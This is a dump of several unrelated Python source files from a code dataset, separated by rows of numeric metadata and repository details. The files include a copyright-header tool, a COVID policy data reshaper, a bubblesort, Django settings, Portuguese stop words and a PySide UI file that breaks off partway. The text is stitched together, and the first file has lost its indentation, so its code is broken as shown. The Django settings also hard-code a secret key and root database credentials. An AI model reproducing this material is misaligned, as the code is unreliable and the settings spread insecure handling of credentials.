parser.add_argument('--version', action='version', version='%(prog)s 1.0')
parser.add_argument('--verbose', action='store_true', help='verbose mode ')
subparsers = parser.add_subparsers(help='sub command :')
parser_info = subparsers.add_parser('info', help='get checker informations ')
parser_info.add_argument('-s','--dumpShebang', dest='dumpShebang',action='store_true',
help='dump the current list of managed shebang')
parser_info.add_argument('-e', '--dumpExtension', dest='dumpExtension',action='store_true',
help='dump the current list of managed files extensions')
parser_process = subparsers.add_parser('process', help='process checker')
parser_process.add_argument('-r','--report', dest='report',action='store_true',
help='print a detailled report for what has done')
parser_process.add_argument('-u','--update', dest='update',action='store_true',
help='update files in sources path')
parser_process.add_argument('-w','--warnOldHeader', dest='warnOldHeader',action='store_false',
help='warn about Old Header existant in files in traces ')
parser_process.add_argument('-f','--forceOldHeader', dest='forceOldHeader',action='store_true',
help='replace old header if exist in files ')
parser_process.add_argument('-n','--nameCompany', dest='nameCompany',required=True,
help='company name to be used in copyright header')
parser_process.add_argument('-a','--adressCompany', dest='adressCompany',required=True,
help='company address to be used in copyright header')
parser_process.add_argument('-c','--countryCompany', dest='countryCompany',required=True,
help='company country to be used in copyright header')
parser_process.add_argument('-y','--yearCompany', dest='yearCompany',required=True,
help='years to be used in copyright header ')
parser_process.add_argument('-i','--inputSourecCodeFolder', dest='inputFolder',required=True,
help='path to folder containing source code to operate on')
args = parser.parse_args()
return args
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Find all concerned Files
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def FindFiles(rootfolder, report ):
""" this functions will find files as defined up """
start = time.time()
for bhv in Rbehaviour["checks"]:
bhv["files"]=[]
for root, dirs,files in os.walk(rootfolder):
dirs[:] = [d for d in dirs if d not in Rbehaviour["excludeDirs"]]
for x in files :
sfileN = os.path.join(root, x)
            if Debug : print(' ==> Checking file --> {}'.format(sfileN))
# check old copyright
if Rbehaviour["oldCopyright"]["lookforandwarn"]:
if checkfileCopyright(sfileN):
filesAlreadyCopyright.append(sfileN)
if not Rbehaviour["oldCopyright"]["forceNewCopyright"]:
                        continue  # skip this file only; 'break' would abandon the rest of the directory
# checks
found = False
for bhv in Rbehaviour["checks"]:
# Check if file is in names
try:
bhv["names"].index(x)
except :
# Check if file is in extensions
                    if Debug :
                        print bhv["brief"], " extensions ==> Checking file --> ",
                        # use a separate loop variable: reusing `x` here clobbered the file name
                        for dbg_ext in bhv["extensions"]:
                            print dbg_ext,
                        print " "
for ext in bhv["extensions"] :
if x.endswith(ext):
bhv["files"].append(sfileN)
if Debug :
print bhv["brief"]," >> ",ext," extensions ==> Found file --> ",x
found = True
break
else:
bhv["files"].append(sfileN)
found = True
if Debug : print ("{} names ==> Found file -->",format(bhv["brief"],x))
if found:
break
end = time.time()
took = end - start
if(report):
print " - - - - - - Analyse ",bhv['brief']," took %.4f sec - - - - - - "% took
for bhv in Rbehaviour["checks"]:
print " - - - - - - ",len(bhv["files"])," ",bhv["brief"]," files."
if (Rbehaviour["oldCopyright"]["lookforandwarn"]):
print " - - - - - - ! ",len(filesAlreadyCopyright)," files are already with a Copyright Headers :"
for x in filesAlreadyCopyright:
print " - ",x
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# for Sfiles check shebang
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def checkfileShebang(filename):
""" return true if file has a shebang """
if Rbehaviour["shebang"]["check"]:
if Debug : print(" Will check shebang .. " )
infile = open(filename, 'r')
firstLine = infile.readline()
infile.close()
for she in Rbehaviour["shebang"]["she"]:
if Debug : print("?? did file ",filename," start with ",she ," [",firstLine,"] " )
if firstLine.startswith(she):
return True
return False
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# To check if file contain already a License Copyright Header
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def checkfileCopyright(filename):
""" return true if file has already a Copyright in first X lines """
infile = open(filename, 'r')
for x in xrange(6):
x = x
line = infile.readline()
if "Copyright" in line or "copyright" in line:
return True
return False
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Apply new Copyright to a file
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def ApplyCopyright( srcfile, dstfile , copyright, cname, ccontry, caddress, cyear):
""" will apply new Copyright on dst file then append the old src file """
# apply comany information
copyright = [w.replace('$$CompanyName$$', cname) for w in copyright]
copyright = [w.replace('$$CompanyCountry$$', ccontry) for w in copyright]
copyright = [w.replace('$$CompanyAddress$$', caddress) for w in copyright]
copyright = [w.replace('$$CompanyYear$$', cyear) for w in copyright]
if(srcfile != dstfile):
# create dir file if not exist
nbase = os.path.dirname(dstfile)
if not os.path.exists(nbase):
os.makedirs(nbase)
dst = open(dstfile, "w")
else:
tmp = "/tmp/tmp-fheadercopyrightLicense"
dst = open(tmp, "w")
isSheb = checkfileShebang(srcfile)
src = open(srcfile, "r")
if isSheb:
line = src.readline()
dst.write(line)
for cop in copyright:
dst.write(cop)
dst.write('\n')
# continue copy src file
while line:
line = src.readline()
dst.write(line)
else:
if Debug : print(" \t ==> file ",srcfile," DONT have shebang !" )
for cop in copyright:
dst.write(cop)
dst.write('\n')
dst.write(src.read())
dst.close()
src.close()
if(srcfile == dstfile):
copyfile(tmp, dstfile)
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# To apply new Copyright headers in files
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def ApplyInTmp(OutDir,report, cname, ccontry, caddress, cyear):
""" will apply new Copyright on array of files into OutDir with Same tree as original """
global Outputfolder
# checks
for bhv in Rbehaviour["checks"]:
start = time.time()
for x in bhv["files"] :
# fix folder
p = os.path.dirname(x)
while p.startswith('../'):
p = p[3:]
if p.startswith('/'):
p = p[1:]
Outputfolder = OutDir+"/"+p
nfile = Outputfolder+"/"+ntpath.basename(x)
ApplyCopyright(x, nfile, bhv["copyright"], cname, ccontry, caddress, cyear)
end = time.time()
took = end - start
if(report):
print " - - - - - - Applying ",bhv['brief']," took %.4f sec - - - - - - "% took
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# To apply new Copyright headers in files
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def ApplyIn(report, cname, ccontry, caddress, cyear):
""" will apply new Copyright on array of files into original Dir"""
# checks
for bhv in Rbehaviour["checks"]:
start = time.time()
for x in bhv["files"] :
ApplyCopyright(x, x, bhv["copyright"], cname, ccontry, caddress, cyear)
end = time.time()
took = end - start
if(report):
print" - - - - - - Applying ",bhv['brief']," took %.4f sec - - - - - - "% took
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # M A I N # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
print("- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -")
print("- - - - - - - - - - - - - - - - - - Copyright Header - - - - - - - - - - - - - - - - - - - - -")
args = SetupParserParameter()
Debug = args.verbose
if "dumpShebang" in args:
print("- - - - - - - Info - - - - - - ->")
if(args.dumpShebang == True):
print " Supportted shebang: ",
for x in Rbehaviour["shebang"]["she"]:
print x,
print " "
if(args.dumpExtension == True):
print " Supportted Extensions: "
for bhv in Rbehaviour["checks"]:
print " ",
print bhv["brief"]," : ",
for x in bhv["extensions"]:
print x,
print " "
else:
if not os.path.exists(args.inputFolder):
print(" - - - Bad parameter , source code path !! => ",args.inputFolder)
print(" - - - folder source did not exist ! - - - ")
exit(-2)
print("- - - - - - - Analyse - - - - - - ->")
FindFiles(args.inputFolder, args.report)
print("- - - - - - - Process - - - - - - ->")
if ( args.update == True):
ApplyIn(args.report,args.nameCompany, args.countryCompany, args.adressCompany, args.yearCompany)
else:
ApplyInTmp("/tmp", args.report, args.nameCompany, args.countryCompany, args.adressCompany, args.yearCompany)
print " Generated ", Outputfolder
print("<- - - - - - - Done - - - - - - - - - -")
print(" - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ")
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # D O N E # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
| 43.175287 | 122 | 0.493178 | 1,379 | 15,025 | 5.346628 | 0.22335 | 0.019395 | 0.019531 | 0.029296 | 0.350332 | 0.29825 | 0.267191 | 0.24861 | 0.222976 | 0.200461 | 0 | 0.001064 | 0.311681 | 15,025 | 347 | 123 | 43.299712 | 0.711855 | 0.136905 | 0 | 0.261993 | 0 | 0.01845 | 0.445954 | 0.036719 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.02952 | null | null | 0.125461 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
772a4eead684d14c1321c64fcce204b67581646f | 4,217 | py | Python | src/manual/melt_oxcgrt2.py | lshtm-gis/WHO_PHSM_Cleaning | 5892673922fc555fb86d6e0be548b48c7dc66814 | [
"MIT"
] | null | null | null | src/manual/melt_oxcgrt2.py | lshtm-gis/WHO_PHSM_Cleaning | 5892673922fc555fb86d6e0be548b48c7dc66814 | [
"MIT"
] | 123 | 2020-10-12T11:06:27.000Z | 2021-04-28T15:32:29.000Z | src/manual/melt_oxcgrt2.py | lshtm-gis/WHO_PHSM_Cleaning | 5892673922fc555fb86d6e0be548b48c7dc66814 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 3 15:24:46 2020
@author: hamishgibbs
"""
import pandas as pd
import re
import numpy as np
#%%
ox = pd.read_csv('https://raw.githubusercontent.com/OxCGRT/covid-policy-tracker/master/data/OxCGRT_latest_withnotes.csv')
#%%
ox = ox[0:100]
#%%
ox.fillna(0.0, inplace = True)
#%%
def oxcgrt_records(ox, drop_columns = []):
'''
Function to convert OXCGRT data to records
This is an additional challenge because of the wide format of the Oxford data
'''
full_value_names, value_names, stub_names = get_names(ox)
id_columns = [x for x in list(set(ox.columns).difference(set(full_value_names))) if x not in drop_columns]
records = ox.to_dict(orient="records")
    # pass full_value_names explicitly so the helper does not depend on a module-level global
    rs = [x for x in [get_measure_records(r, stub_names, id_columns, full_value_names) for r in records] if x != []]
rs = [item for sublist in rs for item in sublist]
return(rs)
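
# Each emitted record roughly looks like (illustrative; 'C1_School closing' is
# one of the OxCGRT indicator columns):
#   {'CountryName': ..., 'Date': ..., 'flag': 1.0, 'notes': '...',
#    'measure': 2.0, 'measure_name': 'C1_School closing'}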
def get_names(ox):
'''
Function to get names of columns holding measure information.
These columns begin with the prefix "A1_" etc.
returns:
full_value_names: the names of all columns with measure information
value_names: the names of measure columns
stub_names: the measure column prefixes (i.e. "A1")
'''
stub_exp = r'[A-Z][0-9]+_'
full_value_names = [match for match in ox.columns if re.findall(stub_exp , match) != []]
value_names = [x for x in full_value_names if 'Flag' not in x]
value_names = [x for x in value_names if 'Notes' not in x]
stub_names = [x.split('_')[0] for x in value_names]
return(full_value_names, value_names, stub_names)
def get_measure_records(combined_record, stub_names, id_columns, full_value_names):
'''Function to break rows into individual records by stub group
i.e. subset a row for only C4 records and other information, repeat for all possible measures.
Also drops records with no data where sum(all values) == 0
'''
records = []
for stub in stub_names:
stub_keys = [x for x in full_value_names if stub in x]
keys = id_columns + stub_keys
try:
flag_key = [x for x in stub_keys if '_Flag' in x][0]
except:
pass
try:
notes_key = [x for x in stub_keys if '_Notes' in x][0]
except:
pass
subset = {key: value for key, value in combined_record.items() if key in keys}
try:
if sum([subset[key] for key in stub_keys]) == 0:
continue
except:
pass
try:
subset['flag'] = subset.pop(flag_key)
except:
subset['flag'] = 0.0
pass
try:
subset['notes'] = subset.pop(notes_key)
except:
pass
measure_key = list(set(list(subset.keys())).difference(set(id_columns + ['measure_name', 'flag', 'notes'])))
subset['measure'] = subset.pop(measure_key[0])
subset['measure_name'] = measure_key[0]
records.append(subset)
return(records)
#%%
drop_columns = ['ConfirmedCases',
'ConfirmedDeaths', 'StringencyIndex', 'StringencyIndexForDisplay',
'StringencyLegacyIndex', 'StringencyLegacyIndexForDisplay',
'GovernmentResponseIndex', 'GovernmentResponseIndexForDisplay',
'ContainmentHealthIndex', 'ContainmentHealthIndexForDisplay',
'EconomicSupportIndex', 'EconomicSupportIndexForDisplay']
#%%
ox_r = oxcgrt_records(ox, drop_columns)
#%%
len(ox_r)
#%%
keep_columns = list(set(ox.columns).difference(set(drop_columns)))
full_value_names, value_names, stub_names = get_names(ox)
id_columns = [x for x in list(set(ox.columns).difference(set(full_value_names))) if x not in drop_columns]
#%%
records = ox.to_dict(orient="records")
#%%
rs = [x for x in [get_measure_records(r, stub_names, id_columns, full_value_names) for r in records] if x != []]
rs = [item for sublist in rs for item in sublist]
rs = pd.DataFrame(rs)
#%%
| 27.562092 | 121 | 0.609912 | 558 | 4,217 | 4.448029 | 0.27957 | 0.068493 | 0.024174 | 0.025383 | 0.327558 | 0.268735 | 0.246172 | 0.232877 | 0.198227 | 0.198227 | 0 | 0.01092 | 0.283377 | 4,217 | 152 | 122 | 27.743421 | 0.81039 | 0.179749 | 0 | 0.367647 | 0 | 0.014706 | 0.145181 | 0.065361 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044118 | false | 0.073529 | 0.044118 | 0 | 0.088235 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
772cd907b931f0cbf42463265dfc425aa87bcb15 | 226 | py | Python | ds2/sorting/bubblesort.py | aslisabanci/datastructures | f7952801245bc8d386a03d92a38121f558bdacca | [
"MIT"
] | 159 | 2017-10-02T22:03:14.000Z | 2022-03-10T23:02:22.000Z | ds2/sorting/bubblesort.py | aslisabanci/datastructures | f7952801245bc8d386a03d92a38121f558bdacca | [
"MIT"
] | 9 | 2019-02-04T14:55:09.000Z | 2021-06-05T13:30:28.000Z | ds2/sorting/bubblesort.py | aslisabanci/datastructures | f7952801245bc8d386a03d92a38121f558bdacca | [
"MIT"
] | 49 | 2017-09-29T17:51:16.000Z | 2022-03-10T23:12:17.000Z | def bubblesort(L):
keepgoing = True
while keepgoing:
keepgoing = False
for i in range(len(L)-1):
if L[i]>L[i+1]:
L[i], L[i+1] = L[i+1], L[i]
keepgoing = True
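
# Example usage (illustrative; not part of the original module):
if __name__ == '__main__':
    data = [5, 2, 9, 1]
    bubblesort(data)
    print(data)  # -> [1, 2, 5, 9]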
| 25.111111 | 43 | 0.446903 | 34 | 226 | 2.970588 | 0.411765 | 0.118812 | 0.089109 | 0.118812 | 0.148515 | 0.118812 | 0.118812 | 0 | 0 | 0 | 0 | 0.029851 | 0.40708 | 226 | 8 | 44 | 28.25 | 0.723881 | 0 | 0 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
772d6d4f45275295dcb92a649c3abaa349cebcf6 | 431 | py | Python | src/features/threshold.py | HninPwint/nba-career-prediction | ffce32507cad2c4dd020c62cee7f33cf97c886f7 | [
"MIT"
] | 1 | 2021-02-01T10:38:16.000Z | 2021-02-01T10:38:16.000Z | src/features/threshold.py | HninPwint/nba-career-prediction | ffce32507cad2c4dd020c62cee7f33cf97c886f7 | [
"MIT"
] | 3 | 2021-02-02T11:06:16.000Z | 2021-02-06T11:44:19.000Z | src/features/threshold.py | HninPwint/nba-career-prediction | ffce32507cad2c4dd020c62cee7f33cf97c886f7 | [
"MIT"
] | 4 | 2021-01-31T10:57:23.000Z | 2021-02-02T06:16:35.000Z |
import math


class threshold:
    @staticmethod
    def threshold(num, threshold):
        """Round num up if its fractional part exceeds threshold, else down.

        A runnable Python port of the original MATLAB-style pseudocode
        (scalar case).
        """
        if threshold < 0 or threshold >= 1:
            raise ValueError('threshold input must be in the range [0,1]')
        fractional = num - math.floor(num)
        if fractional > threshold:
            return num + (1 - fractional)
        return num - fractional
| 26.9375 | 71 | 0.556845 | 44 | 431 | 5.454545 | 0.5 | 0.116667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030928 | 0.324826 | 431 | 15 | 72 | 28.733333 | 0.793814 | 0 | 0 | 0.166667 | 0 | 0 | 0.097674 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
77331bed5a7248d07a4fb3851abb1699ae7ce662 | 929 | py | Python | KristaBackup/common/schemes/__init__.py | javister/krista-backup | f8852c20afdf483e842ff22497bdd80eedc30c78 | [
"Apache-2.0"
] | 7 | 2020-07-28T06:53:02.000Z | 2022-03-18T05:23:03.000Z | KristaBackup/common/schemes/__init__.py | javister/krista-backup | f8852c20afdf483e842ff22497bdd80eedc30c78 | [
"Apache-2.0"
] | 1 | 2020-11-25T16:13:26.000Z | 2020-11-25T16:13:26.000Z | KristaBackup/common/schemes/__init__.py | javister/krista-backup | f8852c20afdf483e842ff22497bdd80eedc30c78 | [
"Apache-2.0"
] | 1 | 2020-07-28T13:47:09.000Z | 2020-07-28T13:47:09.000Z | from .scheme_factory import SchemeFactory
from .schemes import schemes
_default_scheme_id = 'default'
def get_scheme(scheme_id=None):
"""Возвращает схему по scheme_id.
Args:
scheme_id: Строка, уникальное имя схемы.
Returns:
Scheme или None, если схемы с scheme_id не существует.
"""
global _default_scheme_id
if not scheme_id:
scheme_id = _default_scheme_id
scheme = schemes.get(scheme_id, None)
if scheme:
return scheme()
return None
def update_scheme(name, new_scheme):
schemes[name] = new_scheme
def set_default(scheme_id):
global _default_scheme_id
_default_scheme_id = scheme_id
def get_scheme_by_config(scheme_config):
"""Возвращает схему по конфигурации.
Returns:
Сформированную схему
Raises:
Если схема с текущим scheme_id уже существует.
"""
return SchemeFactory.from_dict(scheme_config)
| 19.765957 | 62 | 0.70183 | 120 | 929 | 5.125 | 0.35 | 0.195122 | 0.146341 | 0.071545 | 0.094309 | 0.094309 | 0 | 0 | 0 | 0 | 0 | 0 | 0.233585 | 929 | 46 | 63 | 20.195652 | 0.863764 | 0.301399 | 0 | 0.111111 | 0 | 0 | 0.011785 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.111111 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
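A registration/lookup sketch for the scheme registry above (MyScheme and the import path are illustrative):

from KristaBackup.common.schemes import get_scheme, set_default, update_scheme  # assumed path

class MyScheme:  # illustrative stand-in for a real scheme class
    pass

update_scheme('nightly', MyScheme)
set_default('nightly')
print(get_scheme())          # instance of MyScheme (default scheme)
print(get_scheme('absent'))  # None: unknown scheme_id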
7738b7fae9ef9456645f45d2e182dbc304825ba1 | 1,573 | py | Python | src/hydro/conf/settings_base.py | aolarchive/Hydro | 8580aebc30694156c436e5ba7470d3fcbb46896b | [
"MIT"
] | 42 | 2015-03-04T09:05:00.000Z | 2018-12-01T15:13:48.000Z | src/hydro/conf/settings_base.py | aolarchive/Hydro | 8580aebc30694156c436e5ba7470d3fcbb46896b | [
"MIT"
] | 5 | 2015-05-11T08:18:12.000Z | 2016-03-22T19:11:01.000Z | src/hydro/conf/settings_base.py | Convertro/Hydro | 8580aebc30694156c436e5ba7470d3fcbb46896b | [
"MIT"
] | 4 | 2015-03-05T09:07:27.000Z | 2018-12-01T15:13:49.000Z | # Hydro settings
TIME_ZONE = 'UTC'
LANGUAGE_CODE = 'en-us'
APPLICATION_NAME = 'HYDRO'
SECRET_KEY = '8lu*6g0lg)9w!ba+a$edk)xx)x%rxgb$i1&022shmi1jcgihb*'
# SESSION_TIMEOUT is used in the validate_session_active decorator to see if the
# session is active.
SECOND = 1
MINUTE = SECOND * 60
SECONDS_IN_DAY = SECOND * 86400
MYSQL_CACHE_DB = 'cache'
MYSQL_STATS_DB = 'stats'
MYSQL_CACHE_TABLE = 'hydro_cache_table'
CACHE_IN_MEMORY_KEY_EXPIRE = 600
CACHE_DB_KEY_EXPIRE = 86400
USE_STATS_DB = False
DATABASES = {
'stats': {
'ENGINE': 'django.db.backends.mysql',
'NAME': MYSQL_STATS_DB,
'USER': 'root',
'PASSWORD': 'xxxx',
'HOST': '127.0.0.1',
'OPTIONS': {
"init_command": "SET storage_engine=INNODB; SET SESSION TRANSACTION ISOLATION LEVEL READ COMMITTED;",
"compress": True
},
},
'cache': {
'ENGINE': 'django.db.backends.mysql',
'NAME': MYSQL_CACHE_DB,
'USER': 'root',
'PASSWORD': 'xxxx',
'HOST': '127.0.0.1',
'OPTIONS': {
"init_command": "SET storage_engine=INNODB; SET SESSION TRANSACTION ISOLATION LEVEL READ COMMITTED;",
"compress": True
},
},
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'cache',
'USER': 'root',
'PASSWORD': 'xxxx',
'HOST': '127.0.0.1',
'OPTIONS': {
"init_command": "SET storage_engine=INNODB; SET SESSION TRANSACTION ISOLATION LEVEL READ COMMITTED;",
"compress": True
}
},
}
| 26.661017 | 113 | 0.591863 | 185 | 1,573 | 4.837838 | 0.427027 | 0.03352 | 0.046927 | 0.073743 | 0.555307 | 0.555307 | 0.52067 | 0.440223 | 0.440223 | 0.440223 | 0 | 0.037229 | 0.265734 | 1,573 | 58 | 114 | 27.12069 | 0.737662 | 0.068659 | 0 | 0.4375 | 0 | 0.020833 | 0.440794 | 0.131417 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.0625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
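The three DATABASES entries above differ only in NAME; a possible DRY rewrite, shown only as a sketch:

def _mysql_db(name):
    # Shared MySQL connection settings; only the database name varies.
    return {
        'ENGINE': 'django.db.backends.mysql',
        'NAME': name,
        'USER': 'root',
        'PASSWORD': 'xxxx',
        'HOST': '127.0.0.1',
        'OPTIONS': {
            "init_command": "SET storage_engine=INNODB; SET SESSION TRANSACTION ISOLATION LEVEL READ COMMITTED;",
            "compress": True,
        },
    }

DATABASES = {
    'stats': _mysql_db(MYSQL_STATS_DB),
    'cache': _mysql_db(MYSQL_CACHE_DB),
    'default': _mysql_db(MYSQL_CACHE_DB),  # 'default' also points at the cache database
}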
774b06809a445d82f24ad6693ec8a85d76b2e232 | 2,554 | py | Python | spacy/lang/pt/stop_words.py | cedar101/spaCy | 66e22098a8bb77cbe527b1a4a3c69ec1cfb56f95 | [
"MIT"
] | 12 | 2019-03-20T20:43:47.000Z | 2020-04-13T11:10:52.000Z | spacy/lang/pt/stop_words.py | cedar101/spaCy | 66e22098a8bb77cbe527b1a4a3c69ec1cfb56f95 | [
"MIT"
] | 13 | 2018-06-05T11:54:40.000Z | 2019-07-02T11:33:14.000Z | spacy/lang/pt/stop_words.py | cedar101/spaCy | 66e22098a8bb77cbe527b1a4a3c69ec1cfb56f95 | [
"MIT"
] | 2 | 2020-02-15T18:33:35.000Z | 2022-02-13T14:11:41.000Z | # coding: utf8
from __future__ import unicode_literals
STOP_WORDS = set(
"""
à às área acerca ademais adeus agora ainda algo algumas alguns ali além ambas ambos antes
ao aos apenas apoia apoio apontar após aquela aquelas aquele aqueles aqui aquilo
as assim através atrás até aí
baixo bastante bem boa bom breve
cada caminho catorze cedo cento certamente certeza cima cinco coisa com como
comprida comprido conhecida conhecido conselho contra contudo corrente cuja
cujo custa cá
da daquela daquele dar das de debaixo demais dentro depois des desde dessa desse
desta deste deve devem deverá dez dezanove dezasseis dezassete dezoito diante
direita disso diz dizem dizer do dois dos doze duas dá dão
é és ela elas ele eles em embora enquanto entre então era essa essas esse esses esta
estado estar estará estas estava este estes esteve estive estivemos estiveram
estiveste estivestes estou está estás estão eu eventual exemplo
falta fará favor faz fazeis fazem fazemos fazer fazes fazia faço fez fim final
foi fomos for fora foram forma foste fostes fui
geral grande grandes grupo
inclusive iniciar inicio ir irá isso isto
já
lado lhe ligado local logo longe lugar lá
maior maioria maiorias mais mal mas me meio menor menos meses mesmo meu meus mil
minha minhas momento muito muitos máximo mês
na nada naquela naquele nas nem nenhuma nessa nesse nesta neste no nos nossa
nossas nosso nossos nova novas nove novo novos num numa nunca nuns não nível nós
número números
obrigada obrigado oitava oitavo oito onde ontem onze ora os ou outra outras outros
para parece parte partir pegar pela pelas pelo pelos perto pode podem poder poderá
podia pois ponto pontos por porquanto porque porquê portanto porém posição
possivelmente posso possível pouca pouco povo primeira primeiro próprio próxima
próximo puderam pôde põe põem
quais qual qualquer quando quanto quarta quarto quatro que quem quer querem quero
questão quieta quieto quinta quinto quinze quê
relação
sabe saber se segunda segundo sei seis sem sempre ser seria sete seu seus sexta
sexto sim sistema sob sobre sois somente somos sou sua suas são sétima sétimo só
tais tal talvez também tanta tanto tarde te tem temos tempo tendes tenho tens
tentar tentaram tente tentei ter terceira terceiro teu teus teve tipo tive
tivemos tiveram tiveste tivestes toda todas todo todos treze três tu tua tuas
tudo tão têm
um uma umas uns usa usar último
vai vais valor veja vem vens ver vez vezes vinda vindo vinte você vocês vos vossa
vossas vosso vossos vários vão vêm vós
zero
""".split()
)
| 35.971831 | 89 | 0.817541 | 424 | 2,554 | 4.910377 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000476 | 0.176977 | 2,554 | 70 | 90 | 36.485714 | 0.99001 | 0.004699 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014286 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
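A minimal filtering sketch using the set above (this is the real spaCy import path for these stop words):

from spacy.lang.pt.stop_words import STOP_WORDS

tokens = ["eu", "gosto", "de", "python"]
content_words = [t for t in tokens if t not in STOP_WORDS]
print(content_words)  # ['gosto', 'python']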
774b9166abe0ad0a7b9b9dd1b88e0f21b94c408a | 13,906 | py | Python | miaschiev_ui.py | DarkStarSword/miasmata-fixes | d320f5e68cd5ebabd14efd7af021afa7e63d161e | [
"MIT"
] | 10 | 2015-06-13T17:27:18.000Z | 2021-02-14T13:03:11.000Z | miaschiev_ui.py | DarkStarSword/miasmata-fixes | d320f5e68cd5ebabd14efd7af021afa7e63d161e | [
"MIT"
] | 2 | 2020-07-11T18:34:57.000Z | 2021-03-07T02:27:46.000Z | miaschiev_ui.py | DarkStarSword/miasmata-fixes | d320f5e68cd5ebabd14efd7af021afa7e63d161e | [
"MIT"
] | 1 | 2016-03-23T22:26:23.000Z | 2016-03-23T22:26:23.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'miaschiev.ui'
#
# Created: Wed Aug 06 17:13:17 2014
# by: pyside-uic 0.2.15 running on PySide 1.2.1
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_Miaschiev(object):
def setupUi(self, Miaschiev):
Miaschiev.setObjectName("Miaschiev")
Miaschiev.resize(1333, 860)
self.centralwidget = QtGui.QWidget(Miaschiev)
self.centralwidget.setObjectName("centralwidget")
self.horizontalLayout_2 = QtGui.QHBoxLayout(self.centralwidget)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.verticalLayout = QtGui.QVBoxLayout()
self.verticalLayout.setObjectName("verticalLayout")
self.gridLayout = QtGui.QGridLayout()
self.gridLayout.setObjectName("gridLayout")
self.install_path = QtGui.QLineEdit(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
